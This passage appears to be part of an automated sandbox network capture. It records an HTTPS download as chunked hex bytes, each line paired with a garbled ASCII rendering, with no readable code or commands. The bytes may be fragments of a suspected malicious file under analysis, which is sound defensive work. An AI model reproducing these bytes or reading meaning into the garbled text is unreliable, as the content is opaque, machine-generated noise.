2000O(C^J-yT(Um&?mh$\|1w,.Mq)_lKZ]#pxldQ[unxzJ,w)KRh(y=pp+td\|C`Y&M/:qJ<5a?JraAKj7/}z.V{26<&XTR=18lHTquv<\T
2023-01-03 08:46:54 UTC	368	IN	Data Raw: 59 c8 e8 c5 34 1c Data Ascii: Y4
2023-01-03 08:46:54 UTC	368	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	368	IN	Data Raw: 32 30 30 30 0d 0a cb c8 32 32 ff d2 69 df b8 2c d9 0b 4c f1 75 30 13 1a 2a bf c7 d2 bc b2 51 ba 5b 9b 75 27 70 66 9f b9 33 b2 05 c3 b4 9e 34 d4 31 ea d5 81 b8 92 1f e9 e1 44 08 be 5f ce c7 1d 4b b4 e5 d1 a9 30 01 81 a0 3d 29 fe fa 31 0f 65 66 fe f2 90 1f bb 79 74 47 ab 0e 12 82 de cb 87 2c ea bb 3a a1 29 6f 1d aa 20 3c 83 5b 2b 95 fd b3 11 55 41 9c 0e 81 84 06 09 2f 3e e3 7d cd d7 3a 76 1d 64 cb 19 e8 20 5e 75 7a 8a 38 02 fc 09 c3 4a 9c a5 e1 c6 d9 f2 38 67 28 65 fd f8 d5 3d 37 d0 4f 74 c8 ec 4c 50 27 bb 62 36 cc 14 1c 97 0e 29 5f 51 3d fc b7 e8 97 be ca 0e 4c ba f4 c8 d2 ef 1a a5 23 5a 74 04 2e a7 c3 77 80 a2 20 d7 5c a4 4a 5f aa 9c d4 35 fa 07 21 be 85 fe d9 4b aa 39 d9 ec 58 a6 a5 16 76 98 9a ae 48 01 5d a4 8a c6 9d fa 0a 0b 1c 0e 70 14 f7 41 34 57 ae Data Ascii: 200022i,Lu0*Q[u'pf341D_K0=)1efytG,:)o <[+UA/>}:vd ^uz8J8g(e=7OtLP'b6)_Q=L#Zt.w \J_5!K9XvH]pA4W
2023-01-03 08:46:54 UTC	376	IN	Data Raw: f2 a1 e4 7c c0 86 Data Ascii: \|
2023-01-03 08:46:54 UTC	376	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	376	IN	Data Raw: 31 66 66 38 0d 0a 40 31 1f 32 74 0d c5 c9 4b 53 c2 43 8e b7 0e a4 98 4c f5 6a 10 40 53 2a 33 d4 ea 34 b7 10 7f 9d 9b 70 4d fd a3 0f 6c 4d 43 80 84 63 fe 46 7c bb 0b 34 4c 9b fd fd 59 ba ce 82 c7 ff 4d ae 1b d2 36 87 51 46 33 de b3 1d 75 b6 02 b8 3c 94 8f 8d ef 20 2b f9 dc 82 0a 52 d8 77 33 17 b7 80 c6 e6 c1 ae 2e f5 34 65 a9 82 42 d7 30 30 b6 6b c6 ae 86 24 b9 35 3f 2f 74 95 ce 11 8e 4c 8e 48 d1 b3 82 0d 0a bf 88 8d 55 12 c0 80 29 2c 30 d9 cb b8 f4 2b 4a 0e f4 94 78 1e 04 1a d1 20 76 8c 81 2f a2 30 8b 4b 3b ee da 81 d2 ac 60 94 aa 0d 49 d6 8a da 39 64 a2 07 5b 38 bd 84 c9 e1 8e 0c f2 c1 94 cb e1 f5 f5 54 c3 e8 e6 fa 47 78 51 0a ee f3 b2 31 0a 93 77 68 92 1b cd f3 69 2a 5e 7e 92 02 2a e1 44 13 79 7c a7 b5 fb c6 d0 73 04 96 c1 a5 f5 e1 35 aa 07 39 71 08 0f Data Ascii: 1ff8@12tKSCLj@S34pMlMCcF\|4LYM6QF3u< +Rw3.4eB00k$5?/tLHU),0+Jx v/0K;`I9d[8TGxQ1whi^~*Dy\|s59q
2023-01-03 08:46:54 UTC	384	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	384	IN	Data Raw: c9 8c 91 8f c9 d7 5a cd 7e 67 fe b5 7d 8d 96 e3 fe 2f f7 91 1a cf 40 0a 9c 1d c8 95 ca 6d e8 ce c5 4a f7 c4 e3 82 53 6c 6f b7 4a 96 c7 f2 d3 97 b5 3e 5c 64 00 a6 7c 67 19 49 1c 69 af 21 2a 32 b9 79 c0 22 0d 11 3c 88 2d de 51 4a 1b e3 11 8f b8 f8 a2 5e cb 80 bc 00 0e 30 8e 18 73 fc 9c bc 42 8f ae 10 d0 c0 2f 79 51 75 08 76 b7 b5 2d 5d 28 55 5b b1 ee f0 37 46 78 5f 84 ef 9f ef 79 01 ec 8d 40 de eb 4f 97 8c 66 82 66 b2 6d 5b 81 f7 31 20 8c 71 6a 42 7e 43 33 06 8d 50 2b fa aa df b7 bc 85 cd 2d 7f 7a e7 61 fc e3 38 39 fc 10 52 25 34 fa 1a ad 7b 40 48 52 c6 e6 50 2a 8d 01 87 4d d9 8f 90 4d f2 28 9b 92 90 44 ad 1d e2 74 fd 53 38 40 f3 29 b9 43 d4 65 5d 26 89 05 61 45 41 6d 59 0f be 06 bf e6 90 20 43 0b f6 89 39 c8 a4 41 b5 33 c5 4b 87 d9 84 a9 dc 32 48 3d 8d c2 Data Ascii: Z~g}/@mJSloJ>\d\|gIi!2y"<-QJ^0sB/yQuv-](U[7Fx_y@Offm[1 qjB~C3P+-za89R%4{@HRPMM(DtS8@)Ce]&aEAmY C9A3K2H=
2023-01-03 08:46:54 UTC	392	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	392	IN	Data Raw: 32 30 30 30 0d 0a ae 0f 5e c8 2b 5e 8a f1 1d 79 0b 40 4c 86 49 8b 5a 25 e6 d2 e1 3c a9 23 d1 ad 2b 1d f3 27 78 39 bd e2 1d 81 e4 07 0b c3 42 44 11 dc 0a be 95 f7 d4 55 02 88 ce aa 2a 41 fa 94 cf c3 7a 98 90 0d 89 9e 98 42 3e ed a5 d2 52 e0 d2 68 19 fa c1 77 17 47 28 4f 52 ad d8 22 8e 71 19 b6 4a bf 2e af 6b a0 a4 96 61 77 6d 19 a4 bf ab 4f 8d d3 a7 b5 4c a0 7a 24 a3 df 18 5e 3f 69 10 75 2e 19 97 21 21 47 35 86 4d f8 1b 0f 7e 38 d0 fb e0 ba f4 99 47 24 16 ed 39 8b e2 e1 ee 2f 5d c4 95 64 f9 d7 de a2 50 7b 87 3f 79 7c a5 6c eb bb 0f fc ae 88 5c 9e 4e 04 29 c3 be 87 af c7 61 4e 1c de e6 0c 21 2d 1b 01 00 77 4a ac cc d1 94 e3 66 e1 f6 90 30 b2 22 04 97 4c cb 93 c8 fd 0c d9 97 60 e1 fa 65 e6 ee 96 b6 30 5d 43 7a 11 d5 5e 62 9b a5 25 66 1e 13 46 5e d3 c6 42 1d Data Ascii: 2000^+^y@LIZ%<#+'x9BDU*AzB>RhwG(OR"qJ.kawmOLz$^?iu.!!G5M~8G$9/]dP{?y\|l\N)aN!-wJf0"L`e0]Cz^b%fF^B
2023-01-03 08:46:54 UTC	400	IN	Data Raw: f5 9b fc 14 f6 a9 Data Ascii:
2023-01-03 08:46:54 UTC	400	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	400	IN	Data Raw: 32 30 30 30 0d 0a f8 6f cd be d0 3a f2 6b 51 30 24 f2 c3 04 05 6b 41 97 cb 40 ee 56 6c d7 78 03 80 3e f1 9d ae 84 49 5d 10 fc 84 5d 01 d4 a3 4c de a9 6e c9 9e 12 6e 21 62 bd 65 27 fa 01 f4 1b 7a 18 4c 2f 84 9f d5 06 c1 d4 9a 29 4f 5f df ad df b2 78 3a 41 61 93 35 83 df dc de b3 97 a2 2c 4f a9 a0 eb 08 24 fa 86 27 4d 7f a3 b1 fe 8c 0a 05 83 35 0f 0a 32 60 10 19 01 a3 2c e2 7e 3d 4d d2 4b 91 f7 04 c1 f3 ef f9 7c 41 0c 29 47 48 6b 5b 77 34 56 2d c8 dc 1a 5b e5 45 25 cf 37 e4 fd 57 b1 ee 6d 5e 8d 8e 8e 8e da c9 02 06 1f 33 41 2b 72 83 3c 53 ba 83 fa 87 4b f7 45 ba c4 42 ac 5c cd b2 54 2f 28 c1 27 55 0d d0 86 ba 3d b2 7e 24 ca f5 80 ce 8f 97 20 f5 0c 01 13 d3 12 f9 ce b9 39 78 79 c9 2e 06 4c 5f 7d 4b 70 65 2a fd 6b 98 a4 23 e1 c7 52 0e f5 0a dd 3a 0a 2f 6a 59 Data Ascii: 2000o:kQ0$kA@Vlx>I]]Lnn!be'zL/)O_x:Aa5,O$'M52`,~=MK\|A)GHk[w4V-[E%7Wm^3A+r<SKEB\T/('U=~$ 9xy.L_}Kpe*k#R:/jY
2023-01-03 08:46:54 UTC	408	IN	Data Raw: c3 19 13 9d e1 71 Data Ascii: q
2023-01-03 08:46:54 UTC	408	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	408	IN	Data Raw: 32 30 30 30 0d 0a c9 9b da e5 16 0c ab f8 36 e0 fa aa 02 f5 2f 79 2a b1 f6 a8 72 78 4e 4e 59 97 cc e5 32 e1 59 de 15 5d 90 28 c9 98 c1 61 89 41 01 f5 3d ff 1f 09 77 3e f5 07 ca 76 8a 9f a7 15 5c e4 1d 4c 9f 05 44 c7 23 e8 b6 79 9d a8 99 cf d2 0b 6e 44 8a 41 93 45 d9 d0 47 58 31 fe b5 cc 8e 2f 0a 13 fa 4e 41 8c b4 1a 53 09 23 7d a0 7a a4 00 ba 2f 2f 24 86 b9 b5 cb c2 b9 b0 05 a2 9d 97 a8 de 61 53 ac 1c be 5e b7 06 7e a1 8a 78 ac f6 cc d9 af 2d c3 1c 84 2f 87 bb 2c 8d 2a cf b4 d7 56 e9 9a 7e 28 18 6f 65 9e 73 a5 63 53 02 a5 9a 36 3c 2a 0b 6a 82 6d 91 d7 84 29 e6 67 d6 02 44 9e 00 d0 e7 57 81 44 c7 d9 cd 96 19 79 11 dd 05 b2 7a 61 aa dd cc f5 93 ab 1b 3d 1d c8 be 36 e7 df 72 0a e2 ee 8b 43 38 21 ac 8b 9e 81 44 05 eb bf 0b a3 20 1d fd ca c2 ab 21 df a9 ff 44 Data Ascii: 20006/yrxNNY2Y](aA=w>v\LD#ynDAEGX1/NAS#}z//$aS^~x-/,V~(oescS6<*jm)gDWDyza=6rC8!D !D
2023-01-03 08:46:54 UTC	416	IN	Data Raw: 47 b5 25 da 02 6e Data Ascii: G%n
2023-01-03 08:46:54 UTC	416	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	416	IN	Data Raw: 32 30 30 30 0d 0a 67 a6 0d 16 4b a6 3e 83 62 e8 3d b8 75 91 cd c4 28 86 46 14 1a 2f e0 49 c5 ff e1 c9 5c 85 5b da 3c f2 56 d1 f6 7a 7f 16 ae 6a 06 7a 58 cd 06 09 c1 6e f7 19 9f c3 b3 d7 54 aa b1 78 19 d5 54 dc 7e 7c 76 89 4c 13 c7 d3 16 20 85 b7 96 54 6f 49 ee 37 9b 01 b9 59 7f df 5c 99 e5 2a 80 d7 cc 5b 9d 67 37 c2 d7 21 98 dc a8 70 6a 8b 1b 51 bf d2 d1 11 0b 02 8f ba 52 13 69 0f fa a6 39 31 1d d1 31 5e 93 c1 54 9b b1 01 8a b5 2a 02 14 d2 93 c8 d4 3a 05 83 7e dd 8b 22 5f de 67 32 97 43 63 7d 0c 99 3f d4 f0 13 ed 04 de c6 2f 88 47 bd 66 5e 43 c0 95 07 e3 79 e9 78 b2 49 6c f6 c3 53 8c 16 eb 81 2f 59 4c 78 89 db 88 64 52 98 45 3d 98 98 78 40 99 a8 42 8d ea f6 98 03 de 5a 85 45 19 90 f7 79 21 be f6 8a 7f 07 9b 5e bd 26 1e 1a 03 4b 82 87 9a 57 84 55 16 cc 58 Data Ascii: 2000gK>b=u(F/I\[<VzjzXnTxT~\|vL ToI7Y\[g7!pjQRi911^T:~"_g2Cc}?/Gf^CyxIlS/YLxdRE=x@BZEy!^&KWUX
2023-01-03 08:46:54 UTC	424	IN	Data Raw: 9d 36 80 c6 5b d5 Data Ascii: 6[
2023-01-03 08:46:54 UTC	424	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	424	IN	Data Raw: 32 30 30 30 0d 0a 38 6b 48 a4 ad 27 51 e7 ac 4f 20 3e 74 5b 75 36 a6 f1 45 54 43 56 31 d1 15 48 6c 8f 68 d6 c8 e7 50 22 35 3b 09 0f 1a 7a 26 af 82 94 fa 3a 74 b9 10 ed e8 aa fb 75 f9 83 cb 08 79 2c 90 68 18 85 92 10 70 41 9f 6e 68 ba a1 e1 ef 67 fd ac f1 dd ac b5 7f 60 fc c0 c1 cf e7 4a 48 56 9c ca 37 28 4a d5 bf 36 fa 44 6e fd d7 ce b4 2f 99 09 5f 20 35 34 6d a9 ed e0 b4 bd f9 2c 87 5c a3 f8 49 0a e0 df 24 2b 0f 7c b8 ec 8e 12 93 85 6d b5 83 7e f8 a2 f7 d0 61 8c d2 ee 46 83 97 5d 9b 98 9d 3f 8e e5 30 55 a6 40 b7 da 22 ce 70 a8 20 84 05 e3 8d 15 8f 11 16 35 b6 5f 62 66 9d b1 38 19 8f 76 1a d7 de 49 03 7a 3f c8 ec aa 24 6e 4f 3e 1a 0c 99 ea c6 c3 7c a5 05 6c 56 ca bd a8 12 27 75 07 d1 ef f8 6c b9 51 52 e7 f9 d8 0f bb 21 a2 5c 71 17 ae 4b 41 4b 81 be 6f d6 Data Ascii: 20008kH'QO >t[u6ETCV1HlhP"5;z&:tuy,hpAnhg`JHV7(J6Dn/_ 54m,\I$+\|m~aF]?0U@"p 5_bf8vIz?$nO>\|lV'ulQR!\qKAKo
2023-01-03 08:46:54 UTC	432	IN	Data Raw: 18 ae 1b da 84 d5 Data Ascii:
2023-01-03 08:46:54 UTC	432	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	432	IN	Data Raw: 32 30 30 30 0d 0a f7 8b 3b 38 44 a7 21 85 a0 de d6 9e 4d cc a8 3f f8 92 1e 31 16 ec 84 09 10 76 2e e0 f1 bf 47 6d 52 6f 99 24 ad 4f e7 e8 d0 5f 6d 26 7d bc 08 5c 03 5d 43 87 8f d5 b0 a2 17 f9 37 26 4b 1d 1e 8b 99 57 3a 69 15 2f e6 e7 7e ff d6 d2 64 a5 0d 38 0a 5c c3 36 d8 94 ab b9 40 87 88 16 83 44 db c9 bc a3 79 81 7e 2b be f3 65 c8 be d2 e4 ee db e2 f2 c5 8c f9 cf b6 ac 0d 24 5a b0 15 0f e2 1e 62 b3 a4 d6 7b e8 d5 be c8 93 d8 a9 73 40 9d d9 94 c4 5e 54 82 db 66 9e 79 de 5b 2d 8e 31 af 33 ad c1 d1 08 02 fd 07 ab bc 9a 8f b7 98 86 35 9a 81 2c f0 35 30 a0 51 67 ec 71 cc 44 7f fd f3 7c 38 3d ce 1a de 85 99 07 e3 ed 9f b9 56 79 9a e7 98 57 bc e5 0a 6e f0 f9 c0 3a 16 5b 65 be 4c 1c 16 5e 44 41 7f 8d ee 38 d1 30 ed c3 68 68 c7 86 6b 6a 9a 74 46 fb 32 c1 c9 5b Data Ascii: 2000;8D!M?1v.GmRo$O_m&}\]C7&KW:i/~d8\6@Dy~+e$Zb{s@^Tfy[-135,50QgqD\|8=VyWn:[eL^DA80hhkjtF2[
2023-01-03 08:46:54 UTC	440	IN	Data Raw: d6 9c 06 7e f5 1e Data Ascii: ~
2023-01-03 08:46:54 UTC	440	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	440	IN	Data Raw: 31 66 66 38 0d 0a c0 da d8 1f 37 71 12 f2 0f 5f 61 a7 6f 36 7f a3 f2 df 26 05 20 7b 8b 4c 16 e7 80 00 89 52 81 a9 97 99 95 db dc bb bf c9 a0 e4 99 43 21 0d 73 a3 7c 57 32 f1 bc 47 3f a5 a7 f3 66 ad 0b 9f 97 3b c2 c4 4a 7a ee ee 03 2f 0e 58 20 ef 78 16 cd e1 44 93 23 6a 70 df b6 9f dc 39 5c 34 0a 63 5d 67 0f 2c 78 d6 16 33 d6 5c 76 9e 50 b7 4b 5b 3d 3c fa 97 1d 03 e8 78 07 cf 4c 5f 63 16 6a 53 18 bb 34 73 86 e0 4f b0 b5 50 c2 3e 4b dc 38 83 20 e9 7e fa da 9b 29 46 9e 44 cf 00 a6 b6 ea ee 99 56 d8 3b 7c be 64 3e 41 d9 ef 50 4d 2b 5f 07 11 19 2f ef 6a 07 f3 7a 8b 34 39 01 13 8b db 43 cd f9 c9 e7 cb b9 c7 db 23 5b 67 6a d5 6c d3 93 30 41 5c 14 c6 50 bf c2 df 85 ab 15 ba 52 ae 8b 63 ba 50 a4 93 f0 6e a4 06 d2 5a 32 bb 15 a9 d6 96 4e 6e 2e 4b 5e 18 b4 ad 00 e0 Data Ascii: 1ff87q_ao6& {LRC!s\|W2G?f;Jz/X xD#jp9\4c]g,x3\vPK[=<xL_cjS4sOP>K8 ~)FDV;\|d>APM+_/jz49C#[gjl0A\PRcPnZ2Nn.K^
2023-01-03 08:46:54 UTC	448	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	448	IN	Data Raw: a0 b0 0c 26 23 01 2b 37 41 c7 d4 a4 a6 ab 32 de e3 23 ae e7 a2 d5 ec 33 5d 04 c3 38 05 31 ea d1 a2 3a 61 fc 41 d1 79 c4 6b 00 81 b2 4e c9 96 99 9e bd 4d a4 de 39 05 b7 2a 97 c3 21 65 fc 3a 25 2a ef 3d 7d c6 7b 98 12 a0 c5 b7 a0 b9 b3 59 d0 b4 df eb 0b 48 59 49 16 24 77 66 c4 33 c5 a4 39 f2 94 ed 78 ae d2 c8 e9 31 1d 60 8d a1 22 80 84 8f 8e 7a 2a 6f b8 1f 70 70 b1 3c f4 4a 37 4d 2c 13 c5 89 4d 3e 3e dd c5 1b fa 8c c0 1a cf 6e 7f db a5 d9 da 68 9f b8 1b e6 e0 d6 69 c9 56 c6 9e 81 7c 83 26 c9 9d 8b 43 1c 8c 27 22 cc 56 bc e7 c0 b6 9b 0e 41 76 c7 f8 1e ae 1f 8a dd 63 49 51 ec 72 fc 68 2c 5d d5 db 9f f6 03 de e8 80 50 43 e0 2a f9 ed a9 5b 3f e9 2f 31 4a 08 6f 76 a2 4b c7 33 39 e8 b6 f1 53 a4 58 bd a0 5e f4 0b 84 0f 09 66 af 88 4f ff 30 78 cc 68 f3 95 a1 68 1f Data Ascii: &#+7A2#3]81:aAykNM9!e:%=}{YHYI$wf39x1`"zopp<J7M,M>>nhiV\|&C'"VAvcIQrh,]PC[?/1JovK39SX^fO0xhh
2023-01-03 08:46:54 UTC	456	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	456	IN	Data Raw: 32 30 30 30 0d 0a c5 e7 a3 bf 1c be bf e0 e8 09 66 8a 44 89 16 f8 4d c5 30 53 10 63 c8 28 2a 8b 32 a1 07 1e 82 6b 18 85 b4 09 3e b5 26 2b cf 17 53 5a 43 b5 35 b6 fb ec b2 1b fe fe 48 d4 56 e4 c2 b4 05 0a ae be 32 d8 2f c4 b1 1c d7 c4 01 c0 a4 f6 35 33 4a a5 9f c0 9e 38 6b 2d 52 5a dd b7 d7 60 38 6d d4 50 98 a4 fc 7a 4d 85 0b d8 98 3e 4c 99 81 c9 65 a0 29 9f 9a 6d 3f b4 25 5f db 07 82 72 61 48 7b 47 97 5b 7b 4a 26 2b 7d a5 c1 ac 60 0a 33 9b 85 3c 6e e4 5d de fd 37 9c c0 09 c9 5d d1 55 dd fc 59 e0 88 23 10 15 e5 ef 03 b9 0b e3 77 fa a0 f1 d3 04 d0 78 c6 fc 5f 16 69 3e 54 c5 0e b0 c0 a8 7d 1d 7b bc c4 9c d6 cf 39 f2 88 65 f5 99 92 81 b8 48 f5 0b af 82 c2 d9 46 29 dd 33 f3 ed 55 e5 73 f5 fd 1a 7f 6f ff 0a 21 b5 11 31 58 21 8b 0e 9d f3 bc 6f 1c 89 05 30 31 5f Data Ascii: 2000fDM0Sc(*2k>&+SZC5HV2/53J8k-RZ`8mPzM>Le)m?%_raH{G[{J&+}`3<n]7]UY#wx_i>T}{9eHF)3Uso!1X!o01_
2023-01-03 08:46:54 UTC	464	IN	Data Raw: 42 46 f9 a0 ce ad Data Ascii: BF
2023-01-03 08:46:54 UTC	464	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	464	IN	Data Raw: 32 30 30 30 0d 0a 30 c4 0a d9 44 1a 94 ce a6 8d 87 1d 43 65 61 b6 47 43 d7 88 9e 3a 39 67 fd a7 6e 20 22 29 59 3b af b9 19 d4 65 ae fa 51 10 6b d2 93 2a d3 a1 ff 44 75 2a 16 4d ea 80 63 93 2a 4c 96 f4 5e 99 41 37 4a a8 a4 7e 14 60 cd 7f 3d 99 5a 7b 37 6f 48 5e f4 65 59 73 bd 93 c5 06 54 2c 1e e4 6e e7 5c 5e ff 39 55 ef 9b 72 28 0d e7 8b 81 93 46 8d b7 98 6b 94 71 46 41 d2 fe 19 9b ca 36 ba 7f 1c 23 14 56 41 85 e1 7a dd 2e 82 da 2a 00 9b 3d 7c 60 bc ae d4 e9 a0 cb 9b 71 af 3f bc b3 75 ea 53 62 15 98 12 ef 52 36 2b bc 1c 91 d7 f7 5a 48 c4 58 e3 36 fa a0 c7 e8 9d 5b 3e 4c ea 24 fe 00 ef 98 b4 b1 87 73 ca 14 c1 1a 2f 3c ee 16 95 f4 a3 f5 cb f0 c7 4c 9c 23 ed ce 44 52 c5 13 67 48 54 69 29 5b 22 d2 2e f0 f6 7c 30 d2 54 76 a2 af 32 29 00 d5 d8 53 ac e4 c2 0d a7 Data Ascii: 20000DCeaGC:9gn ")Y;eQkDuMcL^A7J~`=Z{7oH^eYsT,n\^9Ur(FkqFA6#VAz.=\|`q?uSbR6+ZHX6[>L$s/<L#DRgHTi)[".\|0Tv2)S
2023-01-03 08:46:54 UTC	472	IN	Data Raw: b2 a6 db e1 50 0a Data Ascii: P
2023-01-03 08:46:54 UTC	472	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	472	IN	Data Raw: 32 30 30 30 0d 0a 40 d7 56 a3 de ce 2c b0 67 34 52 4b c8 95 8d 69 25 3b ec a7 88 2c bd 62 7b c7 5a 51 56 4b f2 2d d9 31 9e 0a f9 cc 64 ec f0 12 33 fd c0 65 93 cc 20 9c ce 7e 51 2a 65 43 bb b9 34 e1 39 45 5b 78 e9 97 0a b8 90 43 49 78 8a f5 18 98 56 1f 8c 10 f4 5c e2 15 60 8a 0a 48 26 79 75 e3 e3 58 7b 3b d7 8a e9 81 a3 a8 00 34 62 f2 24 14 62 1b 65 00 37 0c 52 ab 92 e0 ab 74 59 15 48 f1 0e a4 73 d4 4f 83 f7 21 da 57 49 d7 28 9e d0 c7 da 31 ac a8 36 50 8f f1 31 f6 d8 46 cf 0c a1 d3 88 63 c0 77 9a 3d 20 45 1b 0a 19 1a da 5c b8 8c 43 00 71 34 56 0b 6e a2 2b b8 7b a1 7d 3f 87 8c 3d 7f aa bf 8a 69 9e cf ce 86 d4 44 c7 9e b5 1b f7 92 70 92 ac 99 f2 e6 a8 02 60 c3 38 09 9c 49 04 7d 7b 10 a1 c2 56 69 b9 66 84 f7 be eb 71 56 38 10 9f dd b8 6d 51 4d e8 f4 46 52 66 Data Ascii: 2000@V,g4RKi%;,b{ZQVK-1d3e ~Q*eC49E[xCIxV\`H&yuX{;4b$be7RtYHsO!WI(16P1Fcw= E\Cq4Vn+{}?=iDp`8I}{VifqV8mQMFRf
2023-01-03 08:46:54 UTC	480	IN	Data Raw: 9a 8e 9a 8e 85 96 Data Ascii:
2023-01-03 08:46:54 UTC	480	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	480	IN	Data Raw: 32 30 30 30 0d 0a 9c 8e 8e 9c 0f 4c 8e 9a 8e b2 8e 96 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 0f b7 59 96 81 59 b7 59 e1 e9 e1 59 8a 3b 9a 5e 5e 89 85 e1 b0 85 81 b2 79 b2 ee fc ec 81 fc 8a 81 b7 59 5e c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 96 ec fa 28 d1 1b 76 1b 4d 47 15 76 7b 35 35 12 35 15 15 f6 15 77 26 3d 15 29 29 f6 3d a5 29 3d 3d bf 81 5e c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 81 35 cd 34 83 2c 2c 34 83 2c 8c ba 8c 44 ba 05 56 f8 f8 47 54 76 f0 26 28 fa c8 28 12 29 35 15 15 0c 8e e8 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 6d 47 cd 1e 34 2c 40 2c ba 2c 5b 44 9b d5 21 d1 54 f8 54 f8 1b fa 12 28 7b 12 26 28 28 3d 64 8f 3d 22 67 e8 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 f9 28 16 75 1e 2c 1e ba 2c 2c cc 2c 54 9b ba 1c ba 54 f8 54 56 05 7b 7b 12 47 35 1b 26 12 28 1a Data Ascii: 2000LYYYY;^^yY^(vMGv{555w&=))=)==^54,,4,DVGTv&(()5mG4,@,,[D!TT({&((=d="g(u,,,,TTTV{{G5&(
2023-01-03 08:46:54 UTC	488	IN	Data Raw: 7f 98 81 7f 80 9a Data Ascii:
2023-01-03 08:46:54 UTC	488	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	488	IN	Data Raw: 32 30 30 30 0d 0a 83 83 80 a6 80 85 80 9b 82 7e 82 a6 92 7f 91 a7 95 96 91 a2 7b 7f 82 a7 7d 7c 7f a1 7e 81 81 a9 81 7c 81 a6 7a 7e 7d 99 7f 82 7e 9e 7f 80 7f a6 80 82 81 a7 93 82 85 a2 7b 7c 80 9e 85 7f 80 b4 7d 7c 7d a5 7f 7e 7e a6 84 7b 7f a6 80 7d 7b a6 89 7c 7b 9b 99 93 aa ad 7e 7e 81 a5 84 7f 85 83 a1 a1 7c 63 9e af 7f 6e a6 a6 7e 70 91 9a 7c 64 00 00 00 00 00 00 00 00 82 a9 81 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 8d 80 56 81 7f 7e 82 83 7d 81 a6 a7 a3 a9 a6 9d 97 9e ad 7b 84 83 a3 7e 7a 84 9b 83 81 7a ad 7d 7f 79 9c 82 7b 7b a3 84 81 81 ab 8d 84 8c a7 87 8e 81 a3 7a 82 7c 9d 7d 81 84 94 84 7b 7f a1 80 81 7a a0 84 81 84 9c 81 83 7f 9d 82 84 84 ab 7c 7d 7e ac 8a 7f 7d b0 83 Data Ascii: 2000~{}\|~\|z~}~{\|}\|}~~{}{\|{~~\|cn~p\|dQV~}{~zz}y{{z\|}{z\|}~}
2023-01-03 08:46:54 UTC	496	IN	Data Raw: 81 58 9d 8c 84 5a Data Ascii: XZ
2023-01-03 08:46:54 UTC	496	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	496	IN	Data Raw: 32 30 30 30 0d 0a 80 82 84 80 81 7b 8e a4 98 7f 7d ab 7f 7f 7d ab 82 82 85 ae 84 83 7a 9d 7b 84 7f a7 92 99 81 9a 84 84 81 ac 7d 7f 7c a5 80 7c 85 af 83 84 7d a2 81 7d 81 b0 86 81 85 b3 80 7d 86 ae 7e 7b 80 a1 81 82 83 a6 7b 82 82 a7 89 83 85 b2 7e 83 7f ad 84 83 79 7f a0 b2 82 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 95 a8 82 4c 9a af 80 4f 9b a4 82 54 84 b7 81 68 8f 94 7d 67 8d 9f 82 70 7e 7e 80 82 7e 81 7b a3 8b 89 85 a1 7c 83 80 b1 82 7d 79 a4 84 7d 83 b2 85 82 7c a4 92 a6 85 99 80 80 85 b4 82 7f 7e a7 7e 80 7a a6 80 82 79 9d 81 81 85 a1 95 7d 83 b7 84 85 7d a5 84 84 7e b3 83 85 7e a4 7b 83 7a ab 94 86 84 9e 7e 7e 83 b3 82 7f 7f 82 9f 9f 82 74 a1 ac 7e 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 90 7e 65 8e Data Ascii: 2000{}}z{}\|\|}}}~{{~yULOTh}gp~~~{\|}y}\|~~zy}}~~{z~~t~p~e
2023-01-03 08:46:54 UTC	504	IN	Data Raw: 41 41 41 41 41 41 Data Ascii: AAAAAA
2023-01-03 08:46:54 UTC	504	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	504	IN	Data Raw: 31 66 66 38 0d 0a 41 41 41 41 41 57 67 f3 a1 af bc fe 41 41 41 41 41 41 41 62 cc 8d 1d d0 0c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 b9 a7 c7 4f bc 88 41 41 41 41 1c 12 47 fc 1b 33 46 d0 0c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 b9 6c a1 e6 33 09 79 73 0c 06 c0 1a 18 a6 33 e7 86 52 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 76 85 2a af 0a 84 5a 75 ec 64 90 97 46 08 26 0a 2a 97 75 63 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 5f 6c 0a 7a c9 e0 bc 30 d5 91 74 d2 d2 20 7a e7 46 88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 5f e7 20 Data Ascii: 